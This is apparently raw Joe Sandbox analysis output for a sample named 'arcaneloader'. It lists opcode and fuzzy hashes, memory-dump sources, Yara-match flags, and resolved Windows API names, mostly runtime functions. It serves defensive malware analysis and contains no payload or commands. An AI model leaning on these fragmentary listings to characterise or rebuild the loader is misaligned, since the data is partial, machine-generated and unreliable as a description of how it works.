                                                                          • Instruction ID: 62827bad26b85c6c61e96b59f758b17764d32d5198991736d9b462081eba9e4d
                                                                          • Opcode Fuzzy Hash: 5a8af23135193e542aaee778a5062f8e18ea2cbea26b461d4402258b72e27e8d
                                                                          • Instruction Fuzzy Hash: 2051F2342047928BDB158F2AD0A0672BBA2FF97314F58858EC0C25B757D738D846CB64
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d0761962c65660ab1de48f159aacf8d7d294a0dba220be477feef923e955d6b
                                                                          • Instruction ID: 08626f94e64af72b09c93c9ff3ae49752351c989f4a80567465c101fd1b06d80
                                                                          • Opcode Fuzzy Hash: 9d0761962c65660ab1de48f159aacf8d7d294a0dba220be477feef923e955d6b
                                                                          • Instruction Fuzzy Hash: 3741F2343057918FD7558F2AD0A0672BBE1FF67300B58858EC4C25B793C638E846CB64
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65d2d871dfee3c3844be876702cc68c69bc376b47dbd121d66d0eb4ea68ec262
                                                                          • Instruction ID: 170af991610778a40485c1c44b5bdc66891708df7ce64bacbb45612c40a4bbf9
                                                                          • Opcode Fuzzy Hash: 65d2d871dfee3c3844be876702cc68c69bc376b47dbd121d66d0eb4ea68ec262
                                                                          • Instruction Fuzzy Hash: 844124BA6053048BE7249F15ED927EBB3A2FFC6304F08453EE1C58B251EB788551C79A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 795ac88f71a5259d478c229fb85aa06ba7a57b0bd353fa7810ca05e43ed27985
                                                                          • Instruction ID: 814765e3766555d319cf707e496cfbe146b5f5fe68045dab1ccd5b805da7a945
                                                                          • Opcode Fuzzy Hash: 795ac88f71a5259d478c229fb85aa06ba7a57b0bd353fa7810ca05e43ed27985
                                                                          • Instruction Fuzzy Hash: 3A41D071A447269FC709CF58D49025ABBB1FF49300F05C669D826AFB85C778E852CBD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e0f42ad38c590c7634e2ba5d1137dfdcd76ae0eb2770042d75c91dba6ef5adf5
                                                                          • Instruction ID: 5b3f90e393351f12597a6bad707880b94c693ec0ae3a42ecdc305344320a73ca
                                                                          • Opcode Fuzzy Hash: e0f42ad38c590c7634e2ba5d1137dfdcd76ae0eb2770042d75c91dba6ef5adf5
                                                                          • Instruction Fuzzy Hash: 1941F371A047269FC709CF28D49029AFBF1FB89304F05866DC865ABB81C778E852CBC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37170eda09bd6eb40638867763b4db68f893da07e4702b5c6b04b66bd6807551
                                                                          • Instruction ID: 39dd03e8f0f448245290442f29f0c79a450eb1473318865f6a70489a12196849
                                                                          • Opcode Fuzzy Hash: 37170eda09bd6eb40638867763b4db68f893da07e4702b5c6b04b66bd6807551
                                                                          • Instruction Fuzzy Hash: 1641277150C3924BD309CB2584607BBFBD29FA7209F1C85AEE4D697282D738894BC726
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 12523bb546ca9c95396b7f656a9a2db4593a428e5001b4f5d2a1d0eba7408ce9
                                                                          • Instruction ID: 9b3104ba5a633e916c56589ec26942585f6099772ec27f343b95f76aedfbb1dc
                                                                          • Opcode Fuzzy Hash: 12523bb546ca9c95396b7f656a9a2db4593a428e5001b4f5d2a1d0eba7408ce9
                                                                          • Instruction Fuzzy Hash: 5F31F0742047A18FDB658F2AE0A0622BBF1FF5B314B58858EC4C25B757D338E846CB65
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae51227ff28a6c09479127648c6c6a0c2f7f938a358c7a5114c30b87d4c8b8f1
                                                                          • Instruction ID: 21a8b7c965a9b3cf48bc091feefc43446dbf344c52f397bfec51a71cdae2f7b0
                                                                          • Opcode Fuzzy Hash: ae51227ff28a6c09479127648c6c6a0c2f7f938a358c7a5114c30b87d4c8b8f1
                                                                          • Instruction Fuzzy Hash: 8D41D4756082019BC714AE19C98193BB3E5AF84354F09453FFC99A73E1EB39FC118B96
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9d9610dbd3242fbdf6c517cee7b6671507f12f1df715672d1c46160cc3558bee
                                                                          • Instruction ID: 9c5714fc049e134c06f591df489e3190581ae3b6325a3fddd00d01fb6bc7061c
                                                                          • Opcode Fuzzy Hash: 9d9610dbd3242fbdf6c517cee7b6671507f12f1df715672d1c46160cc3558bee
                                                                          • Instruction Fuzzy Hash: B2313936E483218BC3288F58D89267BA392AF91318F1DD93ED88667751C67A9C054BC9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b956a4c398c261de86be11dc1a83d1cd773496410b94a5f17cac23bd9d5eff51
                                                                          • Instruction ID: 6251db23e39cd309ee106835332b26514ea31fe102d3599706ff362f460104ab
                                                                          • Opcode Fuzzy Hash: b956a4c398c261de86be11dc1a83d1cd773496410b94a5f17cac23bd9d5eff51
                                                                          • Instruction Fuzzy Hash: 5A31CA716082029FD7149E59C880937B7E1EF84358F18893EF899A73E1D739DC52CB4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7d0dfe167a3fb058482cf1b5313cc344fc601acde83377962127b05ef76758b
                                                                          • Instruction ID: a8d4183f2ee881664a2e53bc32adb88e5388d75a7d51571b89191dea1c1d7d7d
                                                                          • Opcode Fuzzy Hash: c7d0dfe167a3fb058482cf1b5313cc344fc601acde83377962127b05ef76758b
                                                                          • Instruction Fuzzy Hash: AC11087AB952084BC728AE64DDE2277B3D2F799300F09B43EC647C3350DA7DD4098609
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction ID: 6e047ebb3f41351a37d8fc31f96acd159bff6a8730bc45c7e3821481a4dfc0ba
                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                          • Instruction Fuzzy Hash: 3711E973A099D50EC3268D3C8410566BFA30AA7234F19539AF4F49B2D3D6268D8A8369
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe8dcccf3bb50b95d5e975ba6bbc0edc1070f533d2f3ee4cad6f8e14d1f7320b
                                                                          • Instruction ID: bba921779408d068b13d900cc3a996d8e66e39da4ba5813f84e58de6558eaf3a
                                                                          • Opcode Fuzzy Hash: fe8dcccf3bb50b95d5e975ba6bbc0edc1070f533d2f3ee4cad6f8e14d1f7320b
                                                                          • Instruction Fuzzy Hash: A911B675E181A68FC75CCF28C8506BBB771EB56300B1D956ACC95E7395C63C8C138658
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1e634ed8ed39cff8d4bac0f857df12344068522de52526cef14fc6a8a667acb4
                                                                          • Instruction ID: 80d71b1da595b56017aafc5d6007f66fcae9aa32f9fe9f3761167f5da5fc782b
                                                                          • Opcode Fuzzy Hash: 1e634ed8ed39cff8d4bac0f857df12344068522de52526cef14fc6a8a667acb4
                                                                          • Instruction Fuzzy Hash: EB01B1F2B0071157D720AE15A6C0B2BB2AAAF94708F49443EE84457782DB79EC05C2E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 53a85959d6bd505434e20ac017647c9829abadfbb748fe37f6c096f14d7a0151
                                                                          • Instruction ID: 2f1d96f3bf78ce61eaea3ac85d35f48bf0869dcfa598ac959f23a4f67d3d85d7
                                                                          • Opcode Fuzzy Hash: 53a85959d6bd505434e20ac017647c9829abadfbb748fe37f6c096f14d7a0151
                                                                          • Instruction Fuzzy Hash: B6017B347142059BDB18CF29CC51B7FB3A2FB96304F18C83DE992932A1D77898A28749
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b0479b11c2ac912cae0977bb37041675096f3d1c32c0b643b09895c950e7550d
                                                                          • Instruction ID: c26ca95b0cd6fe3c8a67b2ee6674c401bf3475512e8854658906a33b05a9d87b
                                                                          • Opcode Fuzzy Hash: b0479b11c2ac912cae0977bb37041675096f3d1c32c0b643b09895c950e7550d
                                                                          • Instruction Fuzzy Hash: ABF02E7B71E55507F610CD6AACC462FF357E7C6354B1A413DE846E3280C579E802F2A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32b87cf70656796013960e9dc3c3036a6de002e5fb4714379f15f406f9eb3b9b
                                                                          • Instruction ID: d03b0b7d5e5ad3c5db16c5d658807742262872709275fd771e772957be1221bf
                                                                          • Opcode Fuzzy Hash: 32b87cf70656796013960e9dc3c3036a6de002e5fb4714379f15f406f9eb3b9b
                                                                          • Instruction Fuzzy Hash: 51D0A779B871454BE3054B20DC02652A7236793210B0DA666D000D3389CABC8005414D
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00DC4CB6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00DC4CC4
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00DC4CD5
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00DC4CE6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00DC4CF7
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00DC4D08
                                                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00DC4D19
                                                                          • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00DC4D2A
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00DC4D3B
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00DC4D4C
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00DC4D5D
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00DC4D6E
                                                                          • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00DC4D7F
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00DC4D90
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00DC4DA1
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00DC4DB2
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00DC4DC3
                                                                          • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00DC4DD4
                                                                          • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00DC4DE5
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00DC4DF6
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00DC4E07
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00DC4E18
                                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00DC4E29
                                                                          • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00DC4E3A
                                                                          • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00DC4E4B
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00DC4E5C
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DC4E6D
                                                                          • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00DC4E7E
                                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DC4E8F
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DC4EA0
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00DC4EB1
                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DC4EC2
                                                                          • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00DC4ED3
                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DC4EE4
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00DC4EF5
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00DC4F06
                                                                          • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00DC4F17
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00DC4F28
                                                                          • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00DC4F39
                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00DC4F4A
                                                                          • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00DC4F5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                          • API String ID: 667068680-295688737
                                                                          • Opcode ID: c5cfaced3e2ed633bae798d2f1541db5baaa1ad8deea11685f1735d40cfad2e3
                                                                          • Instruction ID: fbf0d75d63f34393194a6a8f384e604e72836146ab152a8fb34acb397a761255
                                                                          • Opcode Fuzzy Hash: c5cfaced3e2ed633bae798d2f1541db5baaa1ad8deea11685f1735d40cfad2e3
                                                                          • Instruction Fuzzy Hash: C76145719A3351AFC7806FF4AD1DCC67BA8AB097127405517B101D3362DBB6A085DFB8
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitVariant
                                                                          • String ID: !$#$%$'$-$3$3$9$@$D$H$M
                                                                          • API String ID: 1927566239-3491661982
                                                                          • Opcode ID: 6596f3c6c5fa30ecbef948ed66d6aff8a3e486b3dccf62827eb513e76a0a78ee
                                                                          • Instruction ID: 121d276aa99c51000fc3499f3d51852a063890485bfd97812fd727c9b46db702
                                                                          • Opcode Fuzzy Hash: 6596f3c6c5fa30ecbef948ed66d6aff8a3e486b3dccf62827eb513e76a0a78ee
                                                                          • Instruction Fuzzy Hash: 6C516871208B818ED716CF3C8898306BFE1AB56324F1886ADD5E98F3D6C778D505C7A2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InitVariant
                                                                          • String ID: !$#$%$'$-$3$3$9$@$D$H$M
                                                                          • API String ID: 1927566239-3491661982
                                                                          • Opcode ID: 711cc6fac76b74d1febc30d7e973bcf1d94bd26a364dfc11f23b028188aa74ed
                                                                          • Instruction ID: dae86be3c6dfad29322893d4b18af5c4809293cba288810d2d0bf3a533e04555
                                                                          • Opcode Fuzzy Hash: 711cc6fac76b74d1febc30d7e973bcf1d94bd26a364dfc11f23b028188aa74ed
                                                                          • Instruction Fuzzy Hash: 50515C61108B818ED715CF3C8889306BFE0AB66324F09869DD5E98F3E7D678D505C7A6
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit
                                                                          • String ID: #$#$)$E$G$P$V$]$]
                                                                          • API String ID: 2610073882-2494522491
                                                                          • Opcode ID: fa35570333ef69b228a5dfec1293bb0407821bcb9b27d0ebc8204184fd8e718a
                                                                          • Instruction ID: ffdf440070372fbd7dfa978b0690f9b4c0eaaad4364bcdb87e5fee263bd6537d
                                                                          • Opcode Fuzzy Hash: fa35570333ef69b228a5dfec1293bb0407821bcb9b27d0ebc8204184fd8e718a
                                                                          • Instruction Fuzzy Hash: B2417971108B828FD715DF3DD888742BFA0AB56324F08869DD9E58F3EAC379D5058B62
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit
                                                                          • String ID: #$#$)$E$G$P$V$]$]
                                                                          • API String ID: 2610073882-2494522491
                                                                          • Opcode ID: b153d9bb0c88e19dfe667af7a87021dbae4fc7c83a6461f5e123a05b35094088
                                                                          • Instruction ID: aefb5da6fed8bfdef980abcbf91de1354391c709698abcb039425a60924a68d4
                                                                          • Opcode Fuzzy Hash: b153d9bb0c88e19dfe667af7a87021dbae4fc7c83a6461f5e123a05b35094088
                                                                          • Instruction Fuzzy Hash: 22416971508B828ED715DF3CD888742BFA06B56324F08869DD9A98F3EAC378D5058B62
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00DC91F2
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00DC9300
                                                                          • CatchIt.LIBVCRUNTIME ref: 00DC9351
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00DC9452
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00DC946D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 4119006552-393685449
                                                                          • Opcode ID: f21608f722860e982710fb0dabafe0918c652ef59e6dfdbbab74162a37866079
                                                                          • Instruction ID: f3bd29cb3a248a5f28ff23c6c37f826e9f355f7a34a9f8c83014e68ea1cae416
                                                                          • Opcode Fuzzy Hash: f21608f722860e982710fb0dabafe0918c652ef59e6dfdbbab74162a37866079
                                                                          • Instruction Fuzzy Hash: 36B1793180020AEFCF19DFA4D899EAEF7B5EF04310B58415EE8116B256C731EA52CBB5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_db0000_arcaneloader.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                          • String ID:
                                                                          • API String ID: 127012223-0
                                                                          • Opcode ID: 5a2b903f34b7874467ac2d7884aafaef13ff659fdf0d7ab49f7c38c397fed8f9
                                                                          • Instruction ID: c7dd95b3e1c1cbb5417dae4e3bece374aa316b24755b2148788f6ab74198d99a
                                                                          • Opcode Fuzzy Hash: 5a2b903f34b7874467ac2d7884aafaef13ff659fdf0d7ab49f7c38c397fed8f9
                                                                          • Instruction Fuzzy Hash: B4719272900246ABDF219EA4A842FAE7FB9DFC9310F18055BED55A7381E775DD008B70
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00DC6167
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00DC616F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00DC61F8
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00DC6223
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00DC6278
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2348371025.0000000000DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DB0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2348295977.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348464972.0000000000DD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348511210.0000000000DDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348615510.0000000000DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348658411.0000000000DE1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2348737927.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
